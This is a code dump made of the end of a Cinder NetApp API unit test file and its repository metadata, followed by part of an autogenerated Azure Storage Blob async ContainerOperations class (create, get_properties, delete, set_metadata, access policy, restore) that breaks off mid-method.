self.assertEqual(1, len(root.get_children()))
e1 = root.get_child_by_name('e1')
self.assertIsInstance(e1, netapp_api.NaElement)
self.assertIsInstance(e1.get_child_by_name('nested'),
netapp_api.NaElement)
def test_setter_child_dict(self):
"""Tests dict is appended as child to root."""
root = netapp_api.NaElement('root')
root['d'] = {'e1': 'v1', 'e2': 'v2'}
e1 = root.get_child_by_name('d')
self.assertIsInstance(e1, netapp_api.NaElement)
sub_ch = e1.get_children()
self.assertEqual(2, len(sub_ch))
for c in sub_ch:
self.assertIn(c.get_name(), ['e1', 'e2'])
if c.get_name() == 'e1':
self.assertEqual('v1', c.get_content())
else:
self.assertEqual('v2', c.get_content())
def test_setter_child_list_tuple(self):
"""Tests list/tuple are appended as child to root."""
root = netapp_api.NaElement('root')
root['l'] = ['l1', 'l2']
root['t'] = ('t1', 't2')
l = root.get_child_by_name('l')
self.assertIsInstance(l, netapp_api.NaElement)
t = root.get_child_by_name('t')
self.assertIsInstance(t, netapp_api.NaElement)
for le in l.get_children():
self.assertIn(le.get_name(), ['l1', 'l2'])
for te in t.get_children():
self.assertIn(te.get_name(), ['t1', 't2'])
def test_setter_no_value(self):
"""Tests key with None value."""
root = netapp_api.NaElement('root')
root['k'] = None
self.assertIsNone(root.get_child_content('k'))
def test_setter_invalid_value(self):
"""Tests invalid value raises exception."""
root = netapp_api.NaElement('root')
try:
root['k'] = netapp_api.NaServer('localhost')
except Exception as e:
if not isinstance(e, TypeError):
self.fail(_('Error not a TypeError.'))
def test_setter_invalid_key(self):
"""Tests invalid value raises exception."""
root = netapp_api.NaElement('root')
try:
root[None] = 'value'
except Exception as e:
if not isinstance(e, KeyError):
self.fail(_('Error not a KeyError.'))
| {
"content_hash": "2d4480146dd74c73ae5c452e733141cf",
"timestamp": "",
"source": "github",
"line_count": 138,
"max_line_length": 75,
"avg_line_length": 39.70289855072464,
"alnum_prop": 0.5831356086877167,
"repo_name": "tlakshman26/cinder-bug-fix-volume-conversion-full",
"id": "7910a68ca7629774dce87da0e935eb910e6e20c7",
"size": "6343",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/volume/drivers/netapp/dataontap/client/test_api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "12371444"
},
{
"name": "Shell",
"bytes": "8172"
}
],
"symlink_target": ""
} |
import datetime
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from ... import models as _models
# Generic deserialized-model type and the signature of the optional per-call
# ``cls`` response hook (pipeline response, deserialized body, headers).
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ContainerOperations:
"""ContainerOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.storage.blob.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        """Store the pipeline client, configuration and (de)serializers.

        :param client: Client for service requests.
        :param config: Configuration of service client.
        :param serializer: An object model serializer.
        :param deserializer: An object model deserializer.
        """
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    async def create(
        self,
        timeout: Optional[int] = None,
        metadata: Optional[str] = None,
        access: Optional[Union[str, "_models.PublicAccessType"]] = None,
        request_id_parameter: Optional[str] = None,
        container_cpk_scope_info: Optional["_models.ContainerCpkScopeInfo"] = None,
        **kwargs
    ) -> None:
        """creates a new container under the specified account. If the container with the same name
        already exists, the operation fails.

        :param timeout: The timeout parameter is expressed in seconds. For more information, see
         :code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
         timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
        :type timeout: int
        :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob.
         If no name-value pairs are specified, the operation will copy the metadata from the source blob
         or file to the destination blob. If one or more name-value pairs are specified, the destination
         blob is created with the specified metadata, and metadata is not copied from the source blob or
         file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming
         rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more
         information.
        :type metadata: str
        :param access: Specifies whether data in the container may be accessed publicly and the level
         of access.
        :type access: str or ~azure.storage.blob.models.PublicAccessType
        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
         limit that is recorded in the analytics logs when storage analytics logging is enabled.
        :type request_id_parameter: str
        :param container_cpk_scope_info: Parameter group.
        :type container_cpk_scope_info: ~azure.storage.blob.models.ContainerCpkScopeInfo
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Per-call response hook and extra error mapping may be injected via kwargs.
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        # Flatten the optional parameter group into its scalar members.
        _default_encryption_scope = None
        _prevent_encryption_scope_override = None
        if container_cpk_scope_info is not None:
            _default_encryption_scope = container_cpk_scope_info.default_encryption_scope
            _prevent_encryption_scope_override = container_cpk_scope_info.prevent_encryption_scope_override
        restype = "container"
        accept = "application/xml"

        # Construct URL
        url = self.create.metadata['url']  # type: ignore
        path_format_arguments = {
            'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
        if timeout is not None:
            query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)

        # Construct headers (optional ones are only added when supplied)
        header_parameters = {}  # type: Dict[str, Any]
        if metadata is not None:
            header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
        if access is not None:
            header_parameters['x-ms-blob-public-access'] = self._serialize.header("access", access, 'str')
        header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
        if request_id_parameter is not None:
            header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
        if _default_encryption_scope is not None:
            header_parameters['x-ms-default-encryption-scope'] = self._serialize.header("default_encryption_scope", _default_encryption_scope, 'str')
        if _prevent_encryption_scope_override is not None:
            header_parameters['x-ms-deny-encryption-scope-override'] = self._serialize.header("prevent_encryption_scope_override", _prevent_encryption_scope_override, 'bool')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Dispatch the PUT through the client pipeline.
        request = self._client.put(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # Anything other than 201 Created is surfaced as an HttpResponseError.
        if response.status_code not in [201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.StorageError, response)
            raise HttpResponseError(response=response, model=error)

        # Deserialize the interesting response headers for the optional cls hook.
        response_headers = {}
        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))

        if cls:
            return cls(pipeline_response, None, response_headers)

    create.metadata = {'url': '/{containerName}'}  # type: ignore
async def get_properties(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
**kwargs
) -> None:
"""returns all user-defined metadata and system properties for the specified container. The data
returned does not include the container's list of blobs.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
restype = "container"
accept = "application/xml"
# Construct URL
url = self.get_properties.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-meta']=self._deserialize('str', response.headers.get('x-ms-meta'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration'))
response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state'))
response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access'))
response_headers['x-ms-has-immutability-policy']=self._deserialize('bool', response.headers.get('x-ms-has-immutability-policy'))
response_headers['x-ms-has-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-has-legal-hold'))
response_headers['x-ms-default-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-default-encryption-scope'))
response_headers['x-ms-deny-encryption-scope-override']=self._deserialize('bool', response.headers.get('x-ms-deny-encryption-scope-override'))
if cls:
return cls(pipeline_response, None, response_headers)
get_properties.metadata = {'url': '/{containerName}'} # type: ignore
async def delete(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""operation marks the specified container for deletion. The container and any blobs contained
within it are later deleted during garbage collection.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
restype = "container"
accept = "application/xml"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
delete.metadata = {'url': '/{containerName}'} # type: ignore
async def set_metadata(
self,
timeout: Optional[int] = None,
metadata: Optional[str] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""operation sets one or more user-defined name-value pairs for the specified container.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param metadata: Optional. Specifies a user-defined name-value pair associated with the blob.
If no name-value pairs are specified, the operation will copy the metadata from the source blob
or file to the destination blob. If one or more name-value pairs are specified, the destination
blob is created with the specified metadata, and metadata is not copied from the source blob or
file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming
rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more
information.
:type metadata: str
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_modified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
restype = "container"
comp = "metadata"
accept = "application/xml"
# Construct URL
url = self.set_metadata.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if metadata is not None:
header_parameters['x-ms-meta'] = self._serialize.header("metadata", metadata, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
set_metadata.metadata = {'url': '/{containerName}'} # type: ignore
async def get_access_policy(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
**kwargs
) -> List["_models.SignedIdentifier"]:
"""gets the permissions for the specified container. The permissions indicate whether container
data may be accessed publicly.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of SignedIdentifier, or the result of cls(response)
:rtype: list[~azure.storage.blob.models.SignedIdentifier]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.SignedIdentifier"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
restype = "container"
comp = "acl"
accept = "application/xml"
# Construct URL
url = self.get_access_policy.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-blob-public-access']=self._deserialize('str', response.headers.get('x-ms-blob-public-access'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
deserialized = self._deserialize('[SignedIdentifier]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get_access_policy.metadata = {'url': '/{containerName}'} # type: ignore
async def set_access_policy(
self,
timeout: Optional[int] = None,
access: Optional[Union[str, "_models.PublicAccessType"]] = None,
request_id_parameter: Optional[str] = None,
container_acl: Optional[List["_models.SignedIdentifier"]] = None,
lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None,
modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None,
**kwargs
) -> None:
"""sets the permissions for the specified container. The permissions indicate whether blobs in a
container may be accessed publicly.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param access: Specifies whether data in the container may be accessed publicly and the level
of access.
:type access: str or ~azure.storage.blob.models.PublicAccessType
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param container_acl: the acls for the container.
:type container_acl: list[~azure.storage.blob.models.SignedIdentifier]
:param lease_access_conditions: Parameter group.
:type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
:param modified_access_conditions: Parameter group.
:type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_lease_id = None
_if_modified_since = None
_if_unmodified_since = None
if lease_access_conditions is not None:
_lease_id = lease_access_conditions.lease_id
if modified_access_conditions is not None:
_if_modified_since = modified_access_conditions.if_modified_since
_if_unmodified_since = modified_access_conditions.if_unmodified_since
restype = "container"
comp = "acl"
content_type = kwargs.pop("content_type", "application/xml")
accept = "application/xml"
# Construct URL
url = self.set_access_policy.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _lease_id is not None:
header_parameters['x-ms-lease-id'] = self._serialize.header("lease_id", _lease_id, 'str')
if access is not None:
header_parameters['x-ms-blob-public-access'] = self._serialize.header("access", access, 'str')
if _if_modified_since is not None:
header_parameters['If-Modified-Since'] = self._serialize.header("if_modified_since", _if_modified_since, 'rfc-1123')
if _if_unmodified_since is not None:
header_parameters['If-Unmodified-Since'] = self._serialize.header("if_unmodified_since", _if_unmodified_since, 'rfc-1123')
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
serialization_ctxt = {'xml': {'name': 'SignedIdentifiers', 'wrapped': True, 'itemsName': 'SignedIdentifier'}}
if container_acl is not None:
body_content = self._serialize.body(container_acl, '[SignedIdentifier]', is_xml=True, serialization_ctxt=serialization_ctxt)
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
set_access_policy.metadata = {'url': '/{containerName}'} # type: ignore
async def restore(
self,
timeout: Optional[int] = None,
request_id_parameter: Optional[str] = None,
deleted_container_name: Optional[str] = None,
deleted_container_version: Optional[str] = None,
**kwargs
) -> None:
"""Restores a previously-deleted container.
:param timeout: The timeout parameter is expressed in seconds. For more information, see
:code:`<a href="https://docs.microsoft.com/en-us/rest/api/storageservices/fileservices/setting-
timeouts-for-blob-service-operations">Setting Timeouts for Blob Service Operations.</a>`.
:type timeout: int
:param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
limit that is recorded in the analytics logs when storage analytics logging is enabled.
:type request_id_parameter: str
:param deleted_container_name: Optional. Version 2019-12-12 and later. Specifies the name of
the deleted container to restore.
:type deleted_container_name: str
:param deleted_container_version: Optional. Version 2019-12-12 and later. Specifies the
version of the deleted container to restore.
:type deleted_container_version: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
restype = "container"
comp = "undelete"
accept = "application/xml"
# Construct URL
url = self.restore.metadata['url'] # type: ignore
path_format_arguments = {
'url': self._serialize.url("self._config.url", self._config.url, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['restype'] = self._serialize.query("restype", restype, 'str')
query_parameters['comp'] = self._serialize.query("comp", comp, 'str')
if timeout is not None:
query_parameters['timeout'] = self._serialize.query("timeout", timeout, 'int', minimum=0)
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['x-ms-version'] = self._serialize.header("self._config.version", self._config.version, 'str')
if request_id_parameter is not None:
header_parameters['x-ms-client-request-id'] = self._serialize.header("request_id_parameter", request_id_parameter, 'str')
if deleted_container_name is not None:
header_parameters['x-ms-deleted-container-name'] = self._serialize.header("deleted_container_name", deleted_container_name, 'str')
if deleted_container_version is not None:
header_parameters['x-ms-deleted-container-version'] = self._serialize.header("deleted_container_version", deleted_container_version, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.StorageError, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
if cls:
return cls(pipeline_response, None, response_headers)
restore.metadata = {'url': '/{containerName}'} # type: ignore
async def acquire_lease(
self,
timeout: Optional[int] = None,
